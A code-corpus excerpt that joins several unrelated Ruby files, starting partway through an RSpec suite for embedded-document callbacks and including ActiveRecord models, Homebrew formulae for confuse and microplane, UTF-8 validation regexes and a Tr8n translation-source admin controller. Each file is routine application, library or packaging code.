context "when the child is persisted" do
let(:band) do
Band.create(name: "Moderat")
end
let!(:record) do
band.records.create(name: "Moderat")
end
context "when the child is dirty" do
before do
record.name = "Nothing"
band.save
end
it "executes the callback" do
expect(record.before_update_called).to be true
end
it "persists the change" do
expect(band.reload.records.first.before_update_called).to be true
end
end
context "when the child is not dirty" do
before do
band.save
end
it "does not execute the callback" do
expect(record.before_update_called).to be false
end
end
end
end
describe "#before_validation" do
context "when the child is new" do
context "when the parent is new" do
let(:band) do
Band.new(name: "Moderat")
end
let!(:record) do
band.records.build(name: "Moderat")
end
before do
band.save
end
it "executes the callback" do
expect(record.before_validation_called).to be true
end
it "persists the change" do
expect(band.reload.records.first.before_validation_called).to be true
end
end
context "when the parent is persisted" do
let(:band) do
Band.create(name: "Moderat")
end
let!(:record) do
band.records.build(name: "Moderat")
end
before do
band.save
end
it "executes the callback" do
expect(record.before_validation_called).to be true
end
it "persists the change" do
expect(band.reload.records.first.before_validation_called).to be true
end
end
context 'when the parent is updated' do
let(:band) do
Band.create(name: "Moderat")
end
before do
band.update(records: [ { name: 'Black on Both Sides' }])
end
it 'executes the callback' do
expect(band.records.first.before_validation_called).to be true
end
it 'persists the change' do
expect(band.reload.records.first.before_validation_called).to be true
end
end
end
context 'when the parent is updated' do
let(:band) do
Band.create(name: "Moderat")
end
before do
band.update(records: [ { name: 'Black on Both Sides' }])
end
it 'executes the callback' do
expect(band.records.first.before_validation_called).to be true
end
it 'persists the change' do
expect(band.reload.records.first.before_validation_called).to be true
end
end
context "when the child is persisted" do
let(:band) do
Band.create(name: "Moderat")
end
let!(:record) do
band.records.create(name: "Moderat")
end
before do
band.save
end
it "executes the callback" do
expect(record.before_validation_called).to be true
end
it "persists the change" do
expect(band.reload.records.first.before_validation_called).to be true
end
end
end
end
context "when the document is embedded multiple levels" do
describe "#before_create" do
context "when the child is new" do
context "when the root is new" do
let(:band) do
Band.new(name: "Moderat")
end
let!(:record) do
band.records.build(name: "Moderat")
end
let!(:track) do
record.tracks.build(name: "Berlin")
end
before do
band.save
end
it "executes the callback" do
expect(track.before_create_called).to be true
end
end
context "when the root is persisted" do
let(:band) do
Band.create(name: "Moderat")
end
let!(:record) do
band.records.build(name: "Moderat")
end
let!(:track) do
record.tracks.build(name: "Berlin")
end
before do
band.save
end
it "executes the callback" do
expect(track.before_create_called).to be true
end
end
end
context "when the child is persisted" do
let(:band) do
Band.create(name: "Moderat")
end
let!(:record) do
band.records.create(name: "Moderat")
end
let!(:track) do
record.tracks.create(name: "Berlin")
end
before do
track.before_create_called = false
band.save
end
it "does not execute the callback" do
expect(track.before_create_called).to be false
end
end
end
describe "#before_save" do
context "when the child is new" do
context "when the root is new" do
let(:band) do
Band.new(name: "Moderat")
end
let!(:record) do
band.records.build(name: "Moderat")
end
let!(:track) do
record.tracks.build(name: "Berlin")
end
before do
band.save
end
let(:reloaded) do
band.reload.records.first
end
it "executes the callback" do
expect(track.before_save_called).to be true
end
it "persists the change" do
expect(reloaded.tracks.first.before_save_called).to be true
end
end
context "when the parent is persisted" do
let(:band) do
Band.create(name: "Moderat")
end
let!(:record) do
band.records.build(name: "Moderat")
end
let!(:track) do
record.tracks.build(name: "Berlin")
end
before do
band.save
end
let(:reloaded) do
band.reload.records.first
end
it "executes the callback" do
expect(track.before_save_called).to be true
end
it "persists the change" do
expect(reloaded.tracks.first.before_save_called).to be true
end
end
end
context "when the child is persisted" do
let(:band) do
Band.create(name: "Moderat")
end
let!(:record) do
band.records.create(name: "Moderat")
end
let!(:track) do
record.tracks.create(name: "Berlin")
end
before do
band.save
end
let(:reloaded) do
band.reload.records.first
end
it "executes the callback" do
expect(track.before_save_called).to be true
end
it "persists the change" do
expect(reloaded.tracks.first.before_save_called).to be true
end
end
end
describe "#before_update" do
context "when the child is new" do
context "when the parent is new" do
let(:band) do
Band.new(name: "Moderat")
end
let!(:record) do
band.records.build(name: "Moderat")
end
let!(:track) do
record.tracks.build(name: "Berlin")
end
before do
band.save
end
it "does not execute the callback" do
expect(track.before_update_called).to be false
end
end
context "when the parent is persisted" do
let(:band) do
Band.create(name: "Moderat")
end
let!(:record) do
band.records.build(name: "Moderat")
end
let!(:track) do
record.tracks.build(name: "Berlin")
end
before do
band.save
end
it "does not execute the callback" do
expect(track.before_update_called).to be false
end
end
end
context "when the child is persisted" do
let(:band) do
Band.create(name: "Moderat")
end
let!(:record) do
band.records.create(name: "Moderat")
end
let!(:track) do
record.tracks.create(name: "Berlin")
end
context "when the child is dirty" do
before do
track.name = "Rusty Nails"
band.save
end
let(:reloaded) do
band.reload.records.first
end
it "executes the callback" do
expect(track.before_update_called).to be true
end
it "persists the change" do
expect(reloaded.tracks.first.before_update_called).to be true
end
end
context "when the child is not dirty" do
before do
band.save
end
it "does not execute the callback" do
expect(track.before_update_called).to be false
end
end
end
end
describe '#after_destroy' do
context 'when the parent is updated in a child after_destroy callback' do
let!(:person) do
Person.create!(ordered_posts: [OrderedPost.new])
end
before do
post = OrderedPost.first
post.destroy
end
it 'updates the parent' do
expect(person.reload.title).to eq('Minus one ordered post.')
end
end
end
describe "#before_validation" do
context "when the child is new" do
context "when the parent is new" do
let(:band) do
Band.new(name: "Moderat")
end
let!(:record) do
band.records.build(name: "Moderat")
end
let!(:track) do
record.tracks.build(name: "Berlin")
end
before do
band.save
end
it "executes the callback" do
expect(track.before_validation_called).to be true
end
end
context "when the parent is persisted" do
let(:band) do
Band.create(name: "Moderat")
end
let!(:record) do
band.records.build(name: "Moderat")
end
let!(:track) do
record.tracks.build(name: "Berlin")
end
before do
band.save
end
it "executes the callback" do
expect(track.before_validation_called).to be true
end
end
end
context "when the child is persisted" do
let(:band) do
Band.create(name: "Moderat")
end
let!(:record) do
band.records.create(name: "Moderat")
end
let!(:track) do
record.tracks.create(name: "Berlin")
end
before do
band.save
end
it "executes the callback" do
expect(track.before_validation_called).to be true
end
end
end
end
end
context "callback on valid?" do
it "goes in all validation callback in good order" do
shin = ValidationCallback.new
shin.valid?
expect(shin.history).to eq([:before_validation, :validate, :after_validation])
end
end
context "when creating child documents in callbacks" do
let(:parent) do
ParentDoc.new
end
before do
parent.save
end
it "does not duplicate the child documents" do
parent.children.create(position: 1)
expect(ParentDoc.find(parent.id).children.size).to eq(1)
end
end
context "when callbacks cancel persistence" do
let(:address) do
Address.new(street: "123 Sesame")
end
before(:all) do
Person.before_save do |doc|
throw(:abort) if doc.mode == :prevent_save
end
end
after(:all) do
Person.reset_callbacks(:save)
end
context "when creating a document" do
let(:person) do
Person.new(mode: :prevent_save, title: "Associate", addresses: [ address ])
end
it "fails to save" do
expect(person).to be_valid
expect(person.save).to be false
end
it "is a new record" do
expect(person).to be_a_new_record
expect { person.save }.not_to change { person.new_record? }
end
it "is left dirty" do
expect(person).to be_changed
expect { person.save }.not_to change { person.changed? }
end
it "child documents are left dirty" do
expect(address).to be_changed
expect { person.save }.not_to change { address.changed? }
end
end
context "when updating a document" do
let(:person) do
Person.create.tap do |person|
person.attributes = {
mode: :prevent_save,
title: "Associate",
addresses: [ address ]
}
end
end
it "#save returns false" do
expect(person).to be_valid
expect(person.save).to be false
end
it "is a not a new record" do
expect(person).to_not be_a_new_record
expect { person.save }.not_to change { person.new_record? }
end
it "is left dirty" do
expect(person).to be_changed
expect { person.save }.not_to change { person.changed? }
end
it "child documents are left dirty" do
expect(address).to be_changed
expect { person.save }.not_to change { address.changed? }
end
end
end
context "when loading a model multiple times" do
before do
load File.join(MODELS, "callback_test.rb")
load File.join(MODELS, "callback_test.rb")
end
let(:callback) do
CallbackTest.new
end
context "when saving the document" do
it "only executes the callbacks once" do
expect(callback).to receive(:execute).once
callback.save
end
end
end
context 'when creating a parent and embedded child' do
let(:registry) { InterceptableSpec::CallbackRegistry.new }
let(:parent) do
InterceptableSpec::CbParent.new(registry).tap do |parent|
parent.cb_children << InterceptableSpec::CbChild.new(registry, cb_parent: parent)
end
end
let(:expected) do
[
[InterceptableSpec::CbParent, :before_validation],
[InterceptableSpec::CbChild, :before_validation],
[InterceptableSpec::CbChild, :after_validation],
[InterceptableSpec::CbParent, :after_validation],
[InterceptableSpec::CbParent, :before_save],
[InterceptableSpec::CbParent, :around_save_open],
[InterceptableSpec::CbParent, :before_create],
[InterceptableSpec::CbParent, :around_create_open],
[InterceptableSpec::CbParent, :around_create_close],
[InterceptableSpec::CbParent, :after_create],
[InterceptableSpec::CbParent, :around_save_close],
[InterceptableSpec::CbParent, :after_save],
]
end
it 'calls callbacks in the right order' do
parent.save!
expect(registry.calls).to eq expected
end
end
context 'when creating a parent and embedded child with cascading callbacks' do
let(:registry) { InterceptableSpec::CallbackRegistry.new }
let(:parent) do
InterceptableSpec::CbParent.new(registry).tap do |parent|
parent.cb_cascaded_children <<
InterceptableSpec::CbCascadedChild.new(registry, cb_parent: parent)
end
end
let(:expected) do
[
[InterceptableSpec::CbCascadedChild, :before_validation],
[InterceptableSpec::CbCascadedChild, :after_validation],
[InterceptableSpec::CbParent, :before_validation],
[InterceptableSpec::CbCascadedChild, :before_validation],
[InterceptableSpec::CbCascadedChild, :after_validation],
[InterceptableSpec::CbParent, :after_validation],
[InterceptableSpec::CbParent, :before_save],
[InterceptableSpec::CbParent, :around_save_open],
[InterceptableSpec::CbParent, :before_create],
[InterceptableSpec::CbParent, :around_create_open],
[InterceptableSpec::CbCascadedChild, :before_save],
[InterceptableSpec::CbCascadedChild, :around_save_open],
[InterceptableSpec::CbCascadedChild, :before_create],
[InterceptableSpec::CbCascadedChild, :around_create_open],
[InterceptableSpec::CbCascadedChild, :around_create_close],
[InterceptableSpec::CbCascadedChild, :after_create],
[InterceptableSpec::CbCascadedChild, :around_save_close],
[InterceptableSpec::CbCascadedChild, :after_save],
[InterceptableSpec::CbParent, :around_create_close],
[InterceptableSpec::CbParent, :after_create],
[InterceptableSpec::CbParent, :around_save_close],
[InterceptableSpec::CbParent, :after_save]
]
end
it 'calls callbacks in the right order' do
parent.save!
expect(registry.calls).to eq expected
end
end
context "with associations" do
context "has_one" do
let(:registry) { InterceptableSpec::CallbackRegistry.new }
let(:parent) do
InterceptableSpec::CbHasOneParent.new(registry).tap do |parent|
parent.child = InterceptableSpec::CbHasOneChild.new(registry)
end
end
let(:expected) do
[
[InterceptableSpec::CbHasOneParent, :before_validation],
[InterceptableSpec::CbHasOneChild, :before_validation],
[InterceptableSpec::CbHasOneChild, :after_validation],
[InterceptableSpec::CbHasOneParent, :after_validation],
[InterceptableSpec::CbHasOneParent, :before_save],
[InterceptableSpec::CbHasOneParent, :around_save_open],
[InterceptableSpec::CbHasOneParent, :before_create],
[InterceptableSpec::CbHasOneParent, :around_create_open],
[InterceptableSpec::CbHasOneParent, :insert_into_database],
[InterceptableSpec::CbHasOneChild, :before_validation],
[InterceptableSpec::CbHasOneChild, :after_validation],
[InterceptableSpec::CbHasOneChild, :before_save],
[InterceptableSpec::CbHasOneChild, :around_save_open],
[InterceptableSpec::CbHasOneChild, :before_create],
[InterceptableSpec::CbHasOneChild, :around_create_open],
[InterceptableSpec::CbHasOneChild, :around_create_close],
[InterceptableSpec::CbHasOneChild, :after_create],
[InterceptableSpec::CbHasOneChild, :around_save_close],
[InterceptableSpec::CbHasOneChild, :after_save],
[InterceptableSpec::CbHasOneParent, :around_create_close],
[InterceptableSpec::CbHasOneParent, :after_create],
[InterceptableSpec::CbHasOneParent, :around_save_close],
[InterceptableSpec::CbHasOneParent, :after_save],
]
end
it 'calls callbacks in the right order' do
parent.save!
expect(registry.calls).to eq expected
end
end
context "embeds_one" do
let(:registry) { InterceptableSpec::CallbackRegistry.new }
let(:parent) do
InterceptableSpec::CbEmbedsOneParent.new(registry).tap do |parent|
parent.child = InterceptableSpec::CbEmbedsOneChild.new(registry)
end
end
context "create" do
let(:expected) do
[
[InterceptableSpec::CbEmbedsOneChild, :before_validation],
[InterceptableSpec::CbEmbedsOneChild, :after_validation],
[InterceptableSpec::CbEmbedsOneParent, :before_validation],
[InterceptableSpec::CbEmbedsOneChild, :before_validation],
[InterceptableSpec::CbEmbedsOneChild, :after_validation],
[InterceptableSpec::CbEmbedsOneParent, :after_validation],
[InterceptableSpec::CbEmbedsOneParent, :before_save],
[InterceptableSpec::CbEmbedsOneParent, :around_save_open],
[InterceptableSpec::CbEmbedsOneParent, :before_create],
[InterceptableSpec::CbEmbedsOneParent, :around_create_open],
[InterceptableSpec::CbEmbedsOneChild, :before_save],
[InterceptableSpec::CbEmbedsOneChild, :around_save_open],
[InterceptableSpec::CbEmbedsOneChild, :before_create],
[InterceptableSpec::CbEmbedsOneChild, :around_create_open],
[InterceptableSpec::CbEmbedsOneParent, :insert_into_database],
[InterceptableSpec::CbEmbedsOneChild, :around_create_close],
[InterceptableSpec::CbEmbedsOneChild, :after_create],
[InterceptableSpec::CbEmbedsOneChild, :around_save_close],
[InterceptableSpec::CbEmbedsOneChild, :after_save],
[InterceptableSpec::CbEmbedsOneParent, :around_create_close],
[InterceptableSpec::CbEmbedsOneParent, :after_create],
[InterceptableSpec::CbEmbedsOneParent, :around_save_close],
[InterceptableSpec::CbEmbedsOneParent, :after_save]
]
end
it 'calls callbacks in the right order' do
parent.save!
expect(registry.calls).to eq expected
end
end
context "update" do
let(:expected) do
[
[InterceptableSpec::CbEmbedsOneChild, :before_validation],
[InterceptableSpec::CbEmbedsOneChild, :after_validation],
[InterceptableSpec::CbEmbedsOneParent, :before_validation],
[InterceptableSpec::CbEmbedsOneChild, :before_validation],
[InterceptableSpec::CbEmbedsOneChild, :after_validation],
[InterceptableSpec::CbEmbedsOneParent, :after_validation],
[InterceptableSpec::CbEmbedsOneParent, :before_save],
[InterceptableSpec::CbEmbedsOneParent, :around_save_open],
[InterceptableSpec::CbEmbedsOneParent, :before_update],
[InterceptableSpec::CbEmbedsOneParent, :around_update_open],
[InterceptableSpec::CbEmbedsOneChild, :before_save],
[InterceptableSpec::CbEmbedsOneChild, :around_save_open],
[InterceptableSpec::CbEmbedsOneChild, :before_update],
[InterceptableSpec::CbEmbedsOneChild, :around_update_open],
[InterceptableSpec::CbEmbedsOneChild, :around_update_close],
[InterceptableSpec::CbEmbedsOneChild, :after_update],
[InterceptableSpec::CbEmbedsOneChild, :around_save_close],
[InterceptableSpec::CbEmbedsOneChild, :after_save],
[InterceptableSpec::CbEmbedsOneParent, :around_update_close],
[InterceptableSpec::CbEmbedsOneParent, :after_update],
[InterceptableSpec::CbEmbedsOneParent, :around_save_close],
[InterceptableSpec::CbEmbedsOneParent, :after_save]
]
end
it 'calls callbacks in the right order' do
parent.callback_registry = nil
parent.child.callback_registry = nil
parent.save!
parent.callback_registry = registry
parent.child.callback_registry = registry
parent.name = "name"
parent.child.age = 10
parent.save!
expect(registry.calls).to eq expected
end
end
end
context "has_many" do
let(:registry) { InterceptableSpec::CallbackRegistry.new }
let(:parent) do
InterceptableSpec::CbHasManyParent.new(registry).tap do |parent|
parent.children = [
InterceptableSpec::CbHasManyChild.new(registry),
InterceptableSpec::CbHasManyChild.new(registry)
]
end
end
let(:expected) do
[
[InterceptableSpec::CbHasManyParent, :before_validation],
[InterceptableSpec::CbHasManyChild, :before_validation],
[InterceptableSpec::CbHasManyChild, :after_validation],
[InterceptableSpec::CbHasManyChild, :before_validation],
[InterceptableSpec::CbHasManyChild, :after_validation],
[InterceptableSpec::CbHasManyParent, :after_validation],
[InterceptableSpec::CbHasManyParent, :before_save],
[InterceptableSpec::CbHasManyParent, :around_save_open],
[InterceptableSpec::CbHasManyParent, :before_create],
[InterceptableSpec::CbHasManyParent, :around_create_open],
[InterceptableSpec::CbHasManyParent, :insert_into_database],
[InterceptableSpec::CbHasManyChild, :before_validation],
[InterceptableSpec::CbHasManyChild, :after_validation],
[InterceptableSpec::CbHasManyChild, :before_save],
[InterceptableSpec::CbHasManyChild, :around_save_open],
[InterceptableSpec::CbHasManyChild, :before_create],
[InterceptableSpec::CbHasManyChild, :around_create_open],
[InterceptableSpec::CbHasManyChild, :around_create_close],
[InterceptableSpec::CbHasManyChild, :after_create],
[InterceptableSpec::CbHasManyChild, :around_save_close],
[InterceptableSpec::CbHasManyChild, :after_save],
[InterceptableSpec::CbHasManyChild, :before_validation],
[InterceptableSpec::CbHasManyChild, :after_validation],
[InterceptableSpec::CbHasManyChild, :before_save],
[InterceptableSpec::CbHasManyChild, :around_save_open],
[InterceptableSpec::CbHasManyChild, :before_create],
[InterceptableSpec::CbHasManyChild, :around_create_open],
[InterceptableSpec::CbHasManyChild, :around_create_close],
[InterceptableSpec::CbHasManyChild, :after_create],
[InterceptableSpec::CbHasManyChild, :around_save_close],
[InterceptableSpec::CbHasManyChild, :after_save],
[InterceptableSpec::CbHasManyParent, :around_create_close],
[InterceptableSpec::CbHasManyParent, :after_create],
[InterceptableSpec::CbHasManyParent, :around_save_close],
[InterceptableSpec::CbHasManyParent, :after_save]
]
end
it 'calls callbacks in the right order' do
parent.save!
expect(registry.calls).to eq expected
end
end
context "embeds_many" do
let(:registry) { InterceptableSpec::CallbackRegistry.new }
let(:parent) do
InterceptableSpec::CbEmbedsManyParent.new(registry).tap do |parent|
parent.children = [
InterceptableSpec::CbEmbedsManyChild.new(registry),
InterceptableSpec::CbEmbedsManyChild.new(registry),
]
end
end
let(:expected) do
[
[InterceptableSpec::CbEmbedsManyChild, :before_validation],
[InterceptableSpec::CbEmbedsManyChild, :after_validation],
[InterceptableSpec::CbEmbedsManyChild, :before_validation],
[InterceptableSpec::CbEmbedsManyChild, :after_validation],
[InterceptableSpec::CbEmbedsManyParent, :before_validation],
[InterceptableSpec::CbEmbedsManyChild, :before_validation],
[InterceptableSpec::CbEmbedsManyChild, :after_validation],
[InterceptableSpec::CbEmbedsManyChild, :before_validation],
[InterceptableSpec::CbEmbedsManyChild, :after_validation],
[InterceptableSpec::CbEmbedsManyParent, :after_validation],
[InterceptableSpec::CbEmbedsManyParent, :before_save],
[InterceptableSpec::CbEmbedsManyParent, :around_save_open],
[InterceptableSpec::CbEmbedsManyParent, :before_create],
[InterceptableSpec::CbEmbedsManyParent, :around_create_open],
[InterceptableSpec::CbEmbedsManyChild, :before_save],
[InterceptableSpec::CbEmbedsManyChild, :around_save_open],
[InterceptableSpec::CbEmbedsManyChild, :before_save],
[InterceptableSpec::CbEmbedsManyChild, :around_save_open],
[InterceptableSpec::CbEmbedsManyChild, :before_create],
[InterceptableSpec::CbEmbedsManyChild, :around_create_open],
[InterceptableSpec::CbEmbedsManyChild, :before_create],
[InterceptableSpec::CbEmbedsManyChild, :around_create_open],
[InterceptableSpec::CbEmbedsManyParent, :insert_into_database],
[InterceptableSpec::CbEmbedsManyChild, :around_create_close],
[InterceptableSpec::CbEmbedsManyChild, :after_create],
[InterceptableSpec::CbEmbedsManyChild, :around_create_close],
[InterceptableSpec::CbEmbedsManyChild, :after_create],
[InterceptableSpec::CbEmbedsManyChild, :around_save_close],
[InterceptableSpec::CbEmbedsManyChild, :after_save],
[InterceptableSpec::CbEmbedsManyChild, :around_save_close],
[InterceptableSpec::CbEmbedsManyChild, :after_save],
[InterceptableSpec::CbEmbedsManyParent, :around_create_close],
[InterceptableSpec::CbEmbedsManyParent, :after_create],
[InterceptableSpec::CbEmbedsManyParent, :around_save_close],
[InterceptableSpec::CbEmbedsManyParent, :after_save]
]
end
it 'calls callbacks in the right order' do
parent.save!
expect(registry.calls).to eq expected
end
end
end
end
| 26.002403 | 94 | 0.570549 |
1d6d8f7b395192e850e1b837802309af2abd6842 | 162 | class VaclPermission < ActiveRecord::Base
has_many :vacl_permission_collections
has_many :vacl_permission_sets, :through => :vacl_permission_collections
end
| 27 | 74 | 0.833333 |
79084efcb231ac5084d55fce24e4d1fb6f73765e | 1,685 | class Confuse < Formula
desc "Configuration file parser library written in C"
homepage "https://github.com/martinh/libconfuse"
url "https://github.com/martinh/libconfuse/releases/download/v3.3/confuse-3.3.tar.xz"
sha256 "1dd50a0320e135a55025b23fcdbb3f0a81913b6d0b0a9df8cc2fdf3b3dc67010"
license "ISC"
bottle do
sha256 "370cd5df07249d44cbf0a848001be19d41341f404d229dcdcb3b5ae6ead4300c" => :big_sur
sha256 "1eeec2cb7b54cf11c1e13448f191ed97d4f2477c215130b6402256678019f36e" => :arm64_big_sur
sha256 "13ad01ca606e746ab7f6bcd42b0da08abdcc29ccaaa9e8106f9d28bfe96bffd7" => :catalina
sha256 "d6038fe2a7fcfea4ba6e3c29174cb6201ce7d05e22ef4c76b881b9f12dabcff6" => :mojave
sha256 "371f699488d7e4459251c55e4ef4d9087b08e07b4fedfc553476bc30070ca9c1" => :high_sierra
sha256 "f33b7f3eb72f36f423997e802ef9f9a427b0690e2ef04ec97b005c694979d523" => :x86_64_linux
end
depends_on "pkg-config" => :build
def install
system "./configure", "--disable-dependency-tracking",
"--prefix=#{prefix}"
system "make", "check"
system "make", "install"
end
test do
(testpath/"test.c").write <<~EOS
#include <confuse.h>
#include <stdio.h>
cfg_opt_t opts[] =
{
CFG_STR("hello", NULL, CFGF_NONE),
CFG_END()
};
int main(void)
{
cfg_t *cfg = cfg_init(opts, CFGF_NONE);
if (cfg_parse_buf(cfg, "hello=world") == CFG_SUCCESS)
printf("%s\\n", cfg_getstr(cfg, "hello"));
cfg_free(cfg);
return 0;
}
EOS
system ENV.cc, "test.c", "-L#{lib}", "-lconfuse", "-o", "test"
assert_match /world/, shell_output("./test")
end
end
| 33.7 | 95 | 0.686053 |
f76cfbabb631df52b2576580c5dd86a0d059c5d0 | 1,240 | module ActiveSupport
module Multibyte #:nodoc:
DEFAULT_NORMALIZATION_FORM = :kc
NORMALIZATIONS_FORMS = [:c, :kc, :d, :kd]
UNICODE_VERSION = '5.0.0'
# Regular expressions that describe valid byte sequences for a character
VALID_CHARACTER = {
# Borrowed from the Kconv library by Shinji KONO - (also as seen on the W3C site)
'UTF-8' => /\A(?:
[\x00-\x7f] |
[\xc2-\xdf] [\x80-\xbf] |
\xe0 [\xa0-\xbf] [\x80-\xbf] |
[\xe1-\xef] [\x80-\xbf] [\x80-\xbf] |
\xf0 [\x90-\xbf] [\x80-\xbf] [\x80-\xbf] |
[\xf1-\xf3] [\x80-\xbf] [\x80-\xbf] [\x80-\xbf] |
\xf4 [\x80-\x8f] [\x80-\xbf] [\x80-\xbf])\z /xn,
# Quick check for valid Shift-JIS characters, disregards the odd-even pairing
'Shift_JIS' => /\A(?:
[\x00-\x7e \xa1-\xdf] |
[\x81-\x9f \xe0-\xef] [\x40-\x7e \x80-\x9e \x9f-\xfc])\z /xn
}
end
end
require 'active_support/multibyte/chars'
require 'active_support/multibyte/utils' | 45.925926 | 87 | 0.457258 |
ffd629dd89cfe2ba8312f802171cb67214e3d942 | 138 | class Topic < ActiveRecord::Base
has_many :topicals
has_many :articles, :through => :topicals
validates :title, :presence => true
end
| 19.714286 | 42 | 0.73913 |
6197fcb99f113c9c4a30ce5948bed42aa4382db9 | 6,621 | #--
# Copyright (c) 2010-2013 Michael Berkovich, tr8nhub.com
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#++
class Tr8n::Admin::SourcesController < Tr8n::Admin::BaseController
def index
@sources = Tr8n::TranslationSource.filter(:params => params, :filter => Tr8n::TranslationSourceFilter)
end
def view
@source = Tr8n::TranslationSource.find_by_id(params[:id])
unless @source
trfe("Invalid source id")
return redirect_to_source
end
if params[:mode] == "translation_keys"
conditions = ["tks.translation_source_id = ?", @source.id]
unless params[:q].blank?
conditions[0] << " and (tr8n_translation_keys.label like ? or tr8n_translation_keys.description like ?)"
conditions << "%#{params[:q]}%"
conditions << "%#{params[:q]}%"
end
@results = Tr8n::TranslationKey.find(:all,
:select => "distinct tr8n_translation_keys.id, tr8n_translation_keys.created_at, label, description, locale, admin, level, translation_count",
:order => "tr8n_translation_keys.created_at desc",
:conditions => conditions,
:joins => [
"join tr8n_translation_key_sources as tks on tr8n_translation_keys.id = tks.translation_key_id",
]
).page(page).per(per_page)
elsif params[:mode] == "translations"
conditions = ["tks.translation_source_id = ?", @source.id]
unless params[:q].blank?
conditions[0] << " and (tr8n_translations.label like ?)"
conditions << "%#{params[:q]}%"
end
@results = Tr8n::Translation.find(:all,
:order => "tr8n_translations.created_at desc",
:conditions => conditions,
:joins => [
"join tr8n_translation_keys as tk on tr8n_translations.translation_key_id = tk.id",
"join tr8n_translation_key_sources as tks on tk.id = tks.translation_key_id",
]
).uniq.page(page).per(per_page)
else
filter = {"wf_c0" => "translation_source_id", "wf_o0" => "is", "wf_v0_0" => @source.id}
@metrics = Tr8n::TranslationSourceMetric.filter(:params => params.merge(filter))
@metrics.wf_filter.extra_params.merge!({:id => @source.id})
end
end
def recalculate_metric
metric = Tr8n::TranslationSourceMetric.find_by_id(params[:metric_id])
unless metric
trfe("Invalid metric id")
return redirect_to_source
end
metric.update_metrics!
trfn("The metric has been updated")
redirect_to_source
end
def recalculate_source
source = Tr8n::TranslationSource.find_by_id(params[:id])
unless source
trfe("Invalid source id")
return redirect_to_source
end
source.translation_source_metrics.each do |metric|
metric.update_metrics!
end
trfn("All metrics have been updated")
redirect_to_source
end
def remove_keys_from_source
source = Tr8n::TranslationSource.find_by_id(params[:id])
unless source
trfe("Invalid source id")
return redirect_to_source
end
if params[:all] == "true"
Tr8n::TranslationKeySource.delete_all(["translation_source_id = ?", source.id])
elsif params[:ids]
Tr8n::TranslationKeySource.delete_all(["translation_source_id = ? and translation_key_id in (?)", source.id, params[:ids]])
end
trfn("Keys have been removed")
source.translation_source_metrics.each do |metric|
metric.update_metrics!
end
redirect_to_source
end
def lb_update
@source = Tr8n::TranslationSource.find_by_id(params[:id]) unless params[:id].blank?
@source = Tr8n::TranslationSource.new unless @source
@apps = Tr8n::Application.options
if request.post?
if @source
@source.update_attributes(params[:source])
else
@source = Tr8n::TranslationSource.create(params[:source])
end
return dismiss_lightbox
end
render :layout => false
end
def key_sources
@key_sources = Tr8n::TranslationKeySource.filter(:params => params, :filter => Tr8n::TranslationKeySourceFilter)
end
def lb_caller
@key_source = Tr8n::TranslationKeySource.find(params[:key_source_id])
@caller = @key_source.details[params[:caller_key]]
render_lightbox
end
def lb_add_to_component
if request.post?
if params[:comp][:key].strip.blank?
component = Tr8n::Component.find_by_id(params[:comp_id])
else
component = Tr8n::Component.create(params[:comp])
end
sources = (params[:sources] || '').split(',')
if sources.any?
sources = Tr8n::TranslationSource.find(:all, :conditions => ["id in (?)", sources])
sources.each do |source|
Tr8n::ComponentSource.find_or_create(component, source)
end
end
translators = (params[:translators] || '').split(',')
if translators.any?
translators = Tr8n::Translator.find(:all, :conditions => ["id in (?)", translators])
translators.each do |translator|
Tr8n::ComponentTranslator.find_or_create(component, translator)
end
end
languages = (params[:languages] || '').split(',')
if languages.any?
languages = Tr8n::Language.find(:all, :conditions => ["id in (?)", languages])
languages.each do |language|
Tr8n::ComponentLanguage.find_or_create(component, language)
end
end
return dismiss_lightbox
end
@apps = Tr8n::Application.options
@components = Tr8n::Component.find(:all, :order => "name asc, key asc").collect{|c| [c.name_and_key, c.id]}
render_lightbox
end
end | 34.305699 | 152 | 0.6715 |
e83a5b12985fecf6972bb90cfafc1ca29703a106 | 1,535 | class Microplane < Formula
desc "CLI tool to make git changes across many repos"
homepage "https://github.com/Clever/microplane"
url "https://github.com/Clever/microplane/archive/v0.0.23.tar.gz"
sha256 "0243aa58559b8a43f5fa7324eee05d490899aa73294737e47451d1fc994769f5"
license "Apache-2.0"
head "https://github.com/Clever/microplane.git"
bottle do
cellar :any_skip_relocation
sha256 "b63bb1e0cae29c2b15cf24bebafaa0422c978570d36d6c81c9c613d65b2e091e" => :big_sur
sha256 "adfd90c4bbc09e44720f246cd719c508d7215b5ab6f9ad756c37018874e92dc4" => :catalina
sha256 "2e5906f81eb7ad280b115c22cd2e88a28daf2b612bb7f35744ace27ab0d2dd9c" => :mojave
sha256 "c5a414e1fa758fcb3d8b8a57b7edf3ea9174a7a71646d9a8e0f10dd2c07fb6ef" => :high_sierra
end
depends_on "dep" => :build
depends_on "go" => :build
def install
ENV["GOPATH"] = buildpath
dir = buildpath/"src/github.com/Clever/microplane"
dir.install buildpath.children
cd "src/github.com/Clever/microplane" do
system "make", "install_deps"
system "make", "build"
bin.install "bin/mp"
end
end
test do
# mandatory env variable
ENV["GITHUB_API_TOKEN"] = "test"
# create repos.txt
(testpath/"repos.txt").write <<~EOF
hashicorp/terraform
EOF
# create mp/init.json
shell_output("mp init -f #{testpath}/repos.txt")
# test command
output = shell_output("mp plan -b microplaning -m 'microplane fun' -r terraform -- sh echo 'hi' 2>&1")
assert_match "planning", output
end
end
| 33.369565 | 106 | 0.726384 |
26abd247dbd230c6d8e710a26206ddb7fb3e42bb | 214 | Rails.application.routes.draw do
# sets views/listings/index.html.erb as the root of the website
root 'listings#index'
# create all the routes neeeded for listings (C.R.U.D.)
resources :listings
end
